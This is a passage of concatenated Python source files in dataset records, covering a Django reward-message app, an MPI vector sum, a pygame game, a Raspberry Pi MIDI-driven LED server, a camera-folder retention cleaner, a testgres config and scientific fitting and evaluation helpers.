}\n return render(request, 'ssafy5_3/messages.html', context)\n\ndef collegues(request):\n students = Student.objects.all()\n juan = Professor.objects.get(pk=1)\n context = {\n 'students': students,\n 'juan': juan,\n }\n return render(request, 'ssafy5_3/collegues.html', context)\n\n\ndef greetings(request):\n greetings = get_list_or_404(Greeting)\n serialized_greetings = []\n for greeting in greetings:\n tmp = greeting.content.split('\\n\\n')\n greetings_content_br = []\n for s in tmp:\n greetings_content_br.extend(s.split('\\n'))\n greetings_content_br.append(' ')\n greetings_content_br.pop()\n \n serialized_greetings.append({\n 'id': greeting.pk,\n 'content': greetings_content_br,\n 'created_at': greeting.created_at,\n })\n juan = get_object_or_404(Professor, pk=1)\n context = {\n 'juan': juan,\n 'greetings': serialized_greetings,\n }\n return render(request, 'ssafy5_3/greetings.html', context)\n\n\n# Reward 페이지의 open에 필요한 coin 개수 불러오기\ndef load_coin(request):\n professor = get_object_or_404(Professor, pk=1)\n coin = professor.coins\n not_opened_num = len(get_list_or_404(Message, is_locked=True))\n # DB의 coin 개수와 아직 열리지 않은 메세지 개수 중에서 더 적은 쪽을 반환한다.\n context = {\n 'coin' : min(coin, not_opened_num)\n }\n return JsonResponse(context)\n\n# DB에 있는 모든 메세지 불러오기\ndef load_messages(request):\n messages = get_list_or_404(Message)\n serialized_messages = []\n for message in messages:\n message_content_br = message.content.replace('\\n','
')\n serialized_messages.append({\n 'id': message.pk,\n 'name': message.student.name if message.student else '',\n 'content': message_content_br,\n 'isLocked' : message.is_locked,\n 'textSize' : 1 if (len(message_content_br)>60) else ( 2 if (len(message_content_br)>40) else 3)\n })\n context = {\n 'messages':serialized_messages,\n }\n return JsonResponse(context)\n\ndef open_message(request, id):\n # 교수님 코인 1개 감소\n professor = get_object_or_404(Professor, pk=1)\n professor.coins = professor.coins - 1\n professor.save()\n # 메세지 오픈 여부 DB 변경\n message = get_object_or_404(Message, pk=id)\n message.is_locked= False\n message.save()\n context = {\n }\n return JsonResponse(context)\n\n# 입력한 개수 만큼의 coin을 추가한다.\n@require_POST\ndef insert_coin(request, coin_num):\n professor = get_object_or_404(Professor, pk=1)\n professor.coins = professor.coins + coin_num\n professor.save()\n\n stage_num = 1 if coin_num==9 else coin_num-9\n return redirect('game:rewards', stage_num)\n \ndef credit(request):\n return render(request, 'ssafy5_3/credit.html')","sub_path":"ssafy5_3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218870840","text":"#!/usr/bin/env python\n\nimport os\nimport numpy as np\nimport time\nfrom mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\ndata_in_dir = os.path.join(os.environ['HOME'], 'Data', 'in', 'vsum')\ntmp_data_dir = os.path.join(os.environ['HOME'], 'tmp', 'vsum')\na_file = os.path.join(data_in_dir, 'a.npy')\nb_file = os.path.join(data_in_dir, 'b.npy')\nc_file = os.path.join(tmp_data_dir, 'slice-%d.npy' % rank)\na = np.load(a_file, mmap_mode='r')\nb = np.load(b_file, mmap_mode='r')\nN = len(a)\nM = int((N + size - 1) / size)\ndef vector_add():\n def add(slice_a, slice_b):\n slice_c = np.empty_like(slice_a)\n start = time.time()\n slice_c = slice_a + slice_b\n end = time.time()\n return (slice_c, end - start)\n\n c = np.memmap(c_file, dtype=np.float32, shape=(M,), mode='w+')\n slice_low = M * rank\n slice_high = M * (rank + 1)\n #print(\"%d: %d(%d/%d)\" % (rank, M, slice_low, slice_high))\n result = add(a[slice_low:slice_high], b[slice_low:slice_high])\n np.append(c, result[0])\n\n return (c, result[1])\n #return c\n\ntotal_start = time.time()\nnode_calc_time = vector_add()[1]\n#vector_add()\ntotal_end = time.time()\nprint(\"%d %s %s\" % (rank, str(total_end-total_start), str(node_calc_time)))\n","sub_path":"vector_sum_mpi.py","file_name":"vector_sum_mpi.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"513391525","text":"import pygame\r\nfrom pygame.sprite import Group\r\n\r\nfrom settings import Settings\r\nfrom game_stats import GameStats\r\nfrom ship import Ship\r\nfrom rectangle import Rectangle\r\nfrom button import Button\r\nimport game_functions as gf\r\n\r\ndef run_game():\r\n # Initialize game and create a screen object.\r\n pygame.init()\r\n ai_settings = Settings()\r\n screen = pygame.display.set_mode(\r\n (ai_settings.screen_width, ai_settings.screen_height))\r\n pygame.display.set_caption(\"Target Practice\")\r\n \r\n # Make the Play button\r\n play_button = Button(ai_settings, screen, \"Play\")\r\n \r\n # Create an instance to store game statistics.\r\n stats = GameStats(ai_settings)\r\n \r\n # Make a ship, a group of bullets, and a rectangle object\r\n ship = Ship(ai_settings, screen)\r\n bullets = Group()\r\n rectangle = Rectangle(ai_settings, screen)\r\n \r\n # Start the main loop for the game\r\n while True:\r\n gf.check_events(ai_settings, screen, stats, play_button, ship,\r\n rectangle, bullets)\r\n if stats.game_active:\r\n ship.update()\r\n gf.update_bullets(stats, bullets)\r\n gf.update_rectangle(ai_settings, stats, rectangle, bullets)\r\n gf.update_screen(ai_settings, screen, stats, ship, rectangle, \r\n bullets, play_button)\r\n \r\nrun_game()\r\n","sub_path":"python-crash-course/exercises/chapter-14/14-3/target_practice.py","file_name":"target_practice.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"400357428","text":"#!/usr/bin/env python3\n\"\"\"\nMax RPi\n============\nVcc -> Pin 2\nGnd -> Pin 6\nDin -> Pin 19\nCs -> Pin 24\nClk -> Pin 23\n\"\"\"\nimport time\nimport sys\nimport random\nimport traceback\nimport rx\nimport rx.operators as ops\nimport socket_fix\n\nfrom luma.core.interface.serial import spi, noop\nfrom luma.core.render import canvas\nfrom luma.core.virtual import viewport\nfrom luma.led_matrix.device import max7219\nfrom blist import blist\nfrom rx.scheduler import NewThreadScheduler\nfrom mido.sockets import PortServer\n\nfrom gfx import UpLine, LeftLine, RightLine, DownLine, Point, Up, Down, Left, Right\nfrom mapping import standard_mapping, randomize, randomize_persist\n\n\nclass Server(object):\n def __init__(self, host, port, note_mapper):\n serial = spi(port=0, device=0, gpio=noop(), cs_high=True)\n device = max7219(serial)\n self._virtual = viewport(device, width=8, height=8)\n self._entities = blist([])\n self._server = PortServer(host, port)\n self._mapper = note_mapper\n\n\n def run(self):\n print('Starting server {}'.format(self._server))\n\n self._subscription = rx.create(self._receive).pipe(\n ops.subscribe_on(NewThreadScheduler()),\n ops.map(lambda msg: self._mapper(msg)),\n ops.filter(lambda gfx: gfx is not None),\n ).subscribe(lambda gfx: self._entities.append(gfx))\n\n\n print('Start')\n while True:\n with canvas(self._virtual) as draw:\n for entity in self._entities:\n entity.render(draw)\n entity.update()\n\n self._entities[:] = [ent for ent in self._entities if not ent.can_destroy()]\n time.sleep(0.010)\n\n\n def _receive(self, observable, scheduler):\n while True:\n try:\n client = self._server.accept()\n print('Connected from {}'.format(client))\n for msg in client:\n observable.on_next(msg)\n except Exception as exp:\n traceback.print_exc()\n print('Connection Closed')\n\n\n def _append(self, note):\n self._entities.append(note)\n\n\nif __name__ == '__main__':\n server = Server(sys.argv[1], int(sys.argv[2]), standard_mapping)\n server.run()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"466297923","text":"import time\nimport json\nimport sys\nimport asyncio\nfrom datetime import datetime\nimport os\nimport shutil\n\nConfig = {\n 'DaysOldTolerated': 7,\n 'MonthsOldTolerated': 0,\n 'YearsOldTolerated': 0,\n 'RefreshRate': 300,\n 'CameraDirectories': [\"\",\"\"],\n 'LaunchOptions': [\"\"],\n }\n\n\ntitle = \" CameraMan ::: BUILT {12:48 AM :: 10/18/2018} \"\nos.system(\"title CM ::: BUILT {1:06 AM :: 10/18/2018}\")\n#Coroutine Taking Over Entire Script \n#async def luuuup():\n# title = \" CM ::: BUILT {12:48 AM :: 10/18/2018} \"\n# def shift(msg):\n# msg = msg[1:] + msg[0]\n# return(msg)\n# while True:\n# await asyncio.sleep(0.09)\n# title = shift(title)\n# os.system(\"title \"+\"[\"+title+\"]\")\n#asyncio.run(luuuup())\n\n\n\n\n## Launch Options: \"skipMenu\",\"runOnce\"\n\nCurrentDirectory = \"\"\n\nInstallPath = os.path.join(os.getenv('programdata'), 'CameraMan')\nif not os.path.isdir(InstallPath):\n os.makedirs(InstallPath)\n\ntry:\n with open(InstallPath+\"/CameraMan.cfg\", 'r') as f:\n Config = json.load(f)\nexcept:\n with open(InstallPath+\"/CameraMan.cfg\", 'w') as f:\n json.dump(Config, f)\n\ndef SaveSettings():\n global Config\n with open(InstallPath+\"/CameraMan.cfg\", 'w') as f:\n json.dump(Config, f)\n\ndef LoadSettings():\n global Config\n with open(InstallPath+\"/CameraMan.cfg\", 'r') as f:\n Config = json.load(f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef run():\n while True:\n LoadSettings()\n\n for i in Config[\"CameraDirectories\"]:\n global CurrentDirectory\n CurrentDirectory = i\n clean(os.listdir(i))\n LoadSettings()\n for i in Config[\"LaunchOptions\"]:\n if i == \"runOnce\":\n sys.exit(0)\n RefreshTime = Config[\"RefreshRate\"]\n\n print(\"----------------------------------------------\")\n ViewingTime = 10\n for i in range(1,10):\n time.sleep(1)\n print(str(10 - i)+\" Seconds Left To View Results.\")\n os.system(\"cls\")\n print(\"Refreshing In: \"+str(RefreshTime)+\" Seconds.\")\n for i in range(1,RefreshTime):\n os.system(\"cls\")\n print(str(RefreshTime - i)+\" Seconds Until Next Purge.\")\n time.sleep(1)\n\n\n\n\ndef getDate():\n year = time.strftime(\"%Y\")\n day = time.strftime(\"%d\")\n month = time.strftime(\"%m\")\n return([year,month,day])\ndef stringifylist(x):\n str = \"\"\n for i in x:\n str = str+i\n return str\ndef clean(listyBoi):\n LoadSettings()\n for i in listyBoi:\n date = getDate()\n year = date[0]\n month = date[1]\n day = date[2]\n i_year = i[:4]\n i_month = i[4:-2]\n i_day = i[6:]\n\n i_date = [i_year,i_month,i_day]\n delete = False\n reasons = []\n\n if int(year) - int(i_year) > Config[\"YearsOldTolerated\"]:\n reasons.insert(len(reasons)+1,\"Too Old By Years\")\n delete = True\n elif int(month) - int(i_month) > Config[\"MonthsOldTolerated\"]:\n reasons.insert(len(reasons)+1,\"Too Old By Months\")\n delete = True\n elif int(day) - int(i_day) > Config[\"DaysOldTolerated\"]:\n reasons.insert(len(reasons)+1,\"Too Old By Days\")\n delete = True\n for i in reasons:\n print(\"[Deleting: (\"+stringifylist(i_date)+\") because of: (\"+i+\")\")\n if len(reasons) > 0:\n shutil.rmtree(CurrentDirectory+\"/\"+stringifylist(i_date))\n # os.rmdir(CurrentDirectory+\"/\"+stringifylist(i_date))\n else:\n print(\"Nothing In \"+CurrentDirectory+\" Matches Deletion Requirements.\")\n\n\ndef drawSettingsMenu():\n os.system(\"cls\")\n print(\"---------------------------------\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"[1]: RefreshRate\")\n print(\"[2]: DaysOldTolerated\")\n print(\"[3]: MonthsOldTolerated\")\n print(\"[4]: YearsOldTolerated\")\n print(\"[5]: CameraDirectories\")\n print(\"[6]: Return\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"---------------------------------\")\n choice = input(\">: \")\n if choice == str(1):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) <= 0:\n raise Exception(\"cannot be lower or equal to 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower or equal to 0\":\n input(\"[Error]: Cannot be lower or equal to 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"RefreshRate\"] = newValue\n SaveSettings()\n elif choice == str(2):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) <= 0:\n raise Exception(\"cannot be lower or equal to 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower or equal to 0\":\n input(\"[Error]: Cannot be lower or equal to 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"DaysOldTolerated\"] = newValue\n SaveSettings()\n elif choice == str(3):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) < 0:\n raise Exception(\"cannot be lower than 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower than 0\":\n input(\"[Error]: Cannot be lower than 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"MonthsOldTolerated\"] = newValue\n SaveSettings()\n elif choice == str(4):\n newValue = input(\"Enter a new value: \")\n try:\n int(newValue)\n if int(newValue) < 0:\n raise Exception(\"cannot be lower than 0\")\n except Exception as Ex:\n if Ex.args[0] == \"cannot be lower than 0\":\n input(\"[Error]: Cannot be lower than 0, Press any key to continue.\")\n else:\n print(\"[Error]: Unknown Error, Press any key to continue.\")\n drawSettingsMenu()\n Config[\"YearsOldTolerated\"] = newValue\n SaveSettings()\n elif choice == str(5):\n print(\" ---------------------------------\")\n print(\" [1]: Add Item To List\")\n print(\" [2]: Remove Item From List\")\n print(\" [3]: List Items\")\n print(\" ---------------------------------\")\n newValue = input(\":> \")\n if newValue == str(1):\n newValue = input(\"Enter New Directory: \")\n Chars = []\n it = 0\n for i in newValue:\n it += 1\n if it > 2:\n print(i + \" > 2\")\n char = i\n if char == \"\\\\\": # Escape the escape character.\n char = \"/\"\n Chars.append(char)\n else:\n print(i + \" else\")\n Chars.append(i)\n newValue = \"\"\n for i in Chars:\n newValue += i\n Config[\"CameraDirectories\"].insert(len(Config[\"CameraDirectories\"])+1,newValue)\n elif newValue == str(2):\n for i in range(len(Config[\"CameraDirectories\"])):\n print(\"[\"+str(i)+\"]\"+\": \"+Config[\"CameraDirectories\"][i])\n newValue = input(\"Delete #: \")\n\n try:\n int(newValue)\n if int(newValue) < 0:\n raise Exception(\"Index too low\")\n elif int(newValue) > len(Config[\"CameraDirectories\"]):\n raise Exception(\"Index too high\")\n except Exception as Ex:\n if Ex.args[0] == \"Index too low\":\n input(\"[Error]: Index too low, Press any key to continue.\")\n elif Ex.args[0] == \"Index too high\":\n input(\"[Error]: Index too high, Press any key to continue.\")\n else:\n input(\"Unexpected Error, Press any key to continue.\")\n drawSettingsMenu()\n\n\n Config[\"CameraDirectories\"].remove(Config[\"CameraDirectories\"][int(newValue)])\n elif newValue == str(3):\n for i in range(len(Config[\"CameraDirectories\"])):\n print(\"[\"+str(i)+\"]\"+\": \"+Config[\"CameraDirectories\"][i])\n input(\"Press any key to continue\")\n SaveSettings()\n elif choice == str(6):\n drawMenu()\n drawSettingsMenu()\n\n\n\ndef drawMenu():\n os.system(\"cls\")\n print(\"---------------------------------\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"[1]: Settings\")\n print(\"[2]: Run\")\n print(\"\\n\")\n print(\"\\n\")\n print(\"---------------------------------\")\n choice = input(\":> \")\n errored = False\n try:\n int(choice)\n errored = False\n except ValueError:\n errored = True\n print(\"ValueError\")\n except:\n errored = True\n print(\"Error\")\n if errored != True:\n if int(choice) == 1:\n drawSettingsMenu()\n elif int(choice) == 2:\n run()\n else:\n print(\"else\")\n drawMenu()\n else:\n drawMenu()\n\n\n\nLoadSettings()\n\nfor i in Config[\"LaunchOptions\"]:\n if i == \"skipMenu\":\n run()\n break\ndrawMenu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"184611440","text":"# coding: utf-8\n\n\nclass TestgresConfig:\n \"\"\"\n Global config (override default settings).\n\n Attributes:\n cache_initdb: shall we use cached initdb instance?\n cache_pg_config: shall we cache pg_config results?\n cached_initdb_dir: shall we create a temp dir for cached initdb?\n node_cleanup_full: shall we remove EVERYTHING (including logs)?\n error_log_lines: N of log lines to be included into exception (0=inf).\n \"\"\"\n\n cache_initdb = True\n cache_pg_config = True\n cached_initdb_dir = None\n node_cleanup_full = True\n error_log_lines = 20\n\n\ndef configure_testgres(**options):\n \"\"\"\n Configure testgres.\n Look at TestgresConfig to check what can be changed.\n \"\"\"\n\n for key, option in options.items():\n setattr(TestgresConfig, key, option)\n","sub_path":"testgres/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205474068","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: misiak\n\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import TextBox, Button\nimport numpy as np\n\nimport mcmc_red as mcr\n\nfrom data_classes import Data_mmr3\nfrom model_classes import Model_ruo2\n\n\nclass Manual_fitting():\n \n text_boxes = list()\n lines = list()\n func = lambda x: list()\n paramnow = list()\n paraminit = list()\n paramprevious = list()\n fig = None\n callback = lambda x: None\n lines_previous = list()\n \n def _update(self, val):\n # getting the values in the text boxes\n param = [float(tbox.text) for tbox in self.text_boxes]\n \n # no update if the same parameters as before\n if param == self.paramnow:\n print('No update. Same param={}'.format(param))\n return None\n \n # saving the previous set of parameters\n self.paramprevious = self.paramnow.copy()\n self.paramnow = param\n \n # evaluating the func for the entered parameters\n new_data = self.func(self.paramnow)\n \n # replacing the ydata of the lines\n for l, nd in zip(self.lines, new_data):\n l.set_ydata(nd)\n \n # autoscale of the axes\n for l in self.lines:\n l.axes.relim()\n l.axes.autoscale(True)\n \n # refresh the figure \n if self.fig:\n self.fig.canvas.draw_idle()\n \n # callback function\n self.callback(param)\n \n # explicit sanity check\n print('Updated with param={}'.format(param))\n \n def _reset(self, event):\n for p0, text_box in zip(self.paraminit, self.text_boxes):\n text_box.set_val(str(p0))\n \n def _previous(self, event):\n # uses an auxiliary list to swap list contents\n param_aux = self.paramprevious.copy()\n self.paramprevious = self.paramnow.copy()\n for ppre, tbox in zip(param_aux, self.text_boxes):\n tbox.set_val(str(ppre))\n # to finish, update, some memoization might be possible here\n self._update(0)\n \n def __init__(self, lines, func, paraminit, callback=None):\n \n self.lines = lines\n self.func = func\n self.fig = lines[0].get_figure()\n self.paraminit = list(paraminit)\n self.nparams = len(paraminit)\n if callable(callback):\n self.callback = callback\n \n # reserving some place for the widgets\n rightl = 0.7\n topl = 0.75\n self.fig.subplots_adjust(right=rightl)\n \n resetax = plt.axes([rightl+0.1, topl, 0.1, 0.045])\n self.reset_button = Button(resetax, 'Reset', hovercolor='0.975')\n self.reset_button.on_clicked(self._reset) \n \n updatax = plt.axes([rightl+0.1, topl-0.05, 0.1, 0.045])\n self.update_button = Button(updatax, 'Update', hovercolor='0.975')\n self.update_button.on_clicked(self._update) \n \n for i,p in enumerate(self.paraminit):\n bot_level = topl-0.1-0.05*i\n axbox = self.fig.add_axes([rightl+0.1, bot_level, 0.15, 0.045])\n text_box = TextBox(axbox, 'param{}'.format(i), initial=str(p)) \n (self.text_boxes).append(text_box)\n\n previax = plt.axes([rightl+0.1, bot_level-0.05, 0.1, 0.045])\n self.previous_button = Button(previax, 'Previous', hovercolor='0.975')\n self.previous_button.on_clicked(self._previous)\n\n # finish with initial update\n self._update(0)\n\n def set_param(self, param):\n # set parameters from command prompt\n for p, tbox in zip(param, self.text_boxes):\n tbox.set_val(str(p)) \n self._update(0)\n \n \nif __name__ == '__main__':\n \n plt.close('all')\n plt.rcParams['text.usetex']=True\n\n data_paths = ('test/MACRT_2019-07-15.csv', 'test/MACRT_2019-07-16.csv')\n# data_paths = ('/home/misiak/Data/data_run59/mmr3/MACRT_2019-09-16.csv', )\n\n data = Data_mmr3(data_paths, version='old')\n model = Model_ruo2()\n \n data_array = data.data_dict['MMR3-205_1_Meas']\n std_array = data_array * 0.01\n\n cover_temp = np.linspace(\n np.min(data.temperature),\n np.max(data.temperature),\n 1000\n )\n\n def model_fun(param):\n term0 = model.function(param, cover_temp)\n term1 = (data_array - model.function(param, data.temperature))/data_array\n return [term0, term1]\n \n model_fun_array = model_fun(model.parameters_0)\n\n def chi2_ruo2(param):\n mod_array = model.function(param, data.temperature)\n chi2_ruo2 = mcr.chi2_simple(mod_array, data_array, std_array)\n return chi2_ruo2\n \n fig = plt.figure()\n axes = fig.subplots(nrows=2, sharex=True)\n \n axes[0].plot(data.temperature, data_array,\n ls='none', marker='+', label='data')\n \n line0, = axes[0].plot(\n cover_temp,\n model_fun_array[0],\n label='model'\n )\n axes[0].set_yscale('log')\n axes[0].set_xscale('log')\n \n line1, = axes[1].plot(\n data.temperature,\n model_fun_array[1],\n label='relative residual',\n ls='none', marker='+'\n ) \n \n for ax in axes:\n ax.grid(True)\n ax.legend()\n\n def chi2_legend(param):\n \n chi2 = chi2_ruo2(param)\n dof = data.nsamples\n for ax in axes:\n ax.legend(title='$\\chi^2=${:.3e}\\ndof={:.3e}'.format(chi2, dof)) \n\n mfit = Manual_fitting(\n [line0,line1],\n model_fun,\n model.parameters_0,\n callback=chi2_legend\n )\n","sub_path":"fitting_class.py","file_name":"fitting_class.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"632766778","text":"import numpy as np\nimport time\n\nts = time.time()\nfrom scipy.optimize import minimize_scalar\nimport pickle\nimport math\n\n\"\"\"# Miscelaneous Functions\n\n\"\"\"\n\n\ndef display_statistics(dynamic, exact_dynamic, noise, formulation_matrices):\n print(\"Noise level: \" + str(noise))\n print(\n \"Recovery error :\"\n + str(np.linalg.norm(dynamic - exact_dynamic))\n + \"\\tDerivative inference :\"\n + str(\n np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_validation\"])\n )\n )\n + \"\\tTrajectory inference :\"\n + str(\n np.linalg.norm(\n np.dot(\n dynamic - exact_dynamic, formulation_matrices[\"matrix_validation\"]\n )\n )\n )\n + \"\\tPrimal gap (derivative training): \"\n + str(\n np.linalg.norm(\n formulation_matrices[\"Y_train\"]\n - np.dot(dynamic, formulation_matrices[\"Psi_train\"])\n )\n )\n + \"\\tPrimal gap (trajectory training): \"\n + str(\n np.linalg.norm(\n formulation_matrices[\"delta_train\"]\n - np.dot(dynamic, formulation_matrices[\"matrix_train\"])\n )\n )\n + \"\\tExtra terms :\"\n + str(np.count_nonzero(np.multiply(exact_dynamic == 0.0, dynamic != 0.0)))\n + \"\\tMissing terms :\"\n + str(np.count_nonzero(np.multiply(exact_dynamic != 0.0, dynamic == 0.0)))\n )\n print()\n return\n\n\ndef evaluate_dynamic(\n data,\n dynamic,\n exact_dynamic,\n noise,\n noise_levels,\n formulation_matrices,\n show_output=False,\n):\n index = noise_levels.index(noise)\n assert (\n \"Psi_validation\" in formulation_matrices\n and \"matrix_validation\" in formulation_matrices\n ), \"Missing validation matrices to compute metrics.\"\n assert (\n \"Y_validation\" in formulation_matrices\n and \"delta_validation\" in formulation_matrices\n ), \"Missing validation matrices to compute metrics.\"\n assert (\n \"Psi_train\" in formulation_matrices and \"matrix_train\" in formulation_matrices\n ), \"Missing training matrices to compute metrics.\"\n assert (\n \"Y_train\" in formulation_matrices and \"delta_train\" in formulation_matrices\n ), \"Missing training matrices to compute metrics.\"\n\n # Recovery_error\n if \"accuracy_recovery\" in data:\n data[\"accuracy_recovery\"][index] = np.linalg.norm(dynamic - exact_dynamic)\n else:\n data[\"accuracy_recovery\"] = np.zeros(len(noise_levels))\n data[\"accuracy_recovery\"][index] = np.linalg.norm(dynamic - exact_dynamic)\n # Inference of derivatives.\n if \"accuracy_data\" in data:\n data[\"accuracy_data\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_validation\"])\n )\n else:\n data[\"accuracy_data\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_validation\"])\n )\n # Inference of trajectories\n if \"accuracy_trajectory\" in data:\n data[\"accuracy_trajectory\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_validation\"])\n )\n else:\n data[\"accuracy_trajectory\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_validation\"])\n )\n # Extra terms\n if \"extra\" in data:\n data[\"extra\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic == 0.0, dynamic != 0.0)\n )\n else:\n data[\"extra\"] = np.zeros(len(noise_levels))\n data[\"extra\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic == 0.0, dynamic != 0.0)\n )\n # Missing terms\n if \"missing\" in data:\n data[\"missing\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic != 0.0, dynamic == 0.0)\n )\n else:\n data[\"missing\"] = np.zeros(len(noise_levels))\n data[\"missing\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic != 0.0, dynamic == 0.0)\n )\n # Inference of derivatives (old measure).\n if \"accuracy_data_old\" in data:\n data[\"accuracy_data_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_validation\"])\n - formulation_matrices[\"Y_validation\"]\n )\n else:\n data[\"accuracy_data_old\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_validation\"])\n - formulation_matrices[\"Y_validation\"]\n )\n # Inference of trajectories (old measure).\n if \"accuracy_trajectory_old\" in data:\n data[\"accuracy_trajectory_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_validation\"])\n - formulation_matrices[\"delta_validation\"]\n )\n else:\n data[\"accuracy_trajectory_old\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_validation\"])\n - formulation_matrices[\"delta_validation\"]\n )\n # Inference of derivatives (training_data)\n if \"accuracy_data_train\" in data:\n data[\"accuracy_data_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_train\"])\n )\n else:\n data[\"accuracy_data_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_train\"])\n )\n # Inference of trajectories (training_data)\n if \"accuracy_trajectory_train\" in data:\n data[\"accuracy_trajectory_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_train\"])\n )\n else:\n data[\"accuracy_trajectory_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_train\"])\n )\n # Inference of derivatives (old measure training data).\n if \"accuracy_data_old_train\" in data:\n data[\"accuracy_data_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_train\"])\n - formulation_matrices[\"Y_train\"]\n )\n else:\n data[\"accuracy_data_old_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_train\"])\n - formulation_matrices[\"Y_train\"]\n )\n # Inference of trajectories (old measure).\n if \"accuracy_trajectory_old_train\" in data:\n data[\"accuracy_trajectory_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_train\"])\n - formulation_matrices[\"delta_train\"]\n )\n else:\n data[\"accuracy_trajectory_old_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_train\"])\n - formulation_matrices[\"delta_train\"]\n )\n if show_output:\n print(\n \"Recovery error :\"\n + str(data[\"accuracy_recovery\"][index])\n + \"\\tDerivative inference :\"\n + str(data[\"accuracy_data\"][index])\n + \"\\tTrajectory inference :\"\n + str(data[\"accuracy_trajectory\"][index])\n + \"\\tExtra terms :\"\n + str(data[\"extra\"][index])\n + \"\\tMissing terms :\"\n + str(data[\"missing\"][index])\n )\n return data\n\n\ndef trim_axs(axs, N):\n \"\"\"little helper to massage the axs list to have correct length...\"\"\"\n axs = axs.flat\n for ax in axs[N:]:\n ax.remove()\n return axs[:N]\n\n\ndef plot_params_tried(p_space, trials, dist_plots=True, **kwargs):\n \"\"\"\n Plots the parameters tried by hyperopt.\n p_space: Hyperopt parameter space.\n trials: Hyperopt trials object.\n dist_plots: If True, plots the distribution of values tried for each parameter.\n If False, plots a scatter plot of loss vs parameter values. Default True.\n params: Parameters to be plotted. Default = All parameters in p_space.\n ncols: Number of columns in the figure. Default = 3\n figsize: Figure size. Default = (15, 5*nrows).\n constrained_layout: Constrained layout. Default = True.\n \"\"\"\n import pandas as pd\n import matplotlib.pyplot as plt\n import seaborn as sns\n from hyperopt import space_eval\n\n defaults = {\"params\": p_space.keys(), \"ncols\": 2, \"constrained_layout\": True}\n defaults = {k: v for k, v in defaults.items() if k not in kwargs}\n kwargs = {**kwargs, **defaults}\n params = kwargs[\"params\"]\n del kwargs[\"params\"]\n results_df = pd.DataFrame(columns=[\"tid\", *params, \"loss\", \"status\"])\n for t in trials.trials:\n result_dict = t[\"misc\"][\"vals\"]\n result_dict = {d: v[0] for d, v in result_dict.items()}\n result_dict = space_eval(p_space, 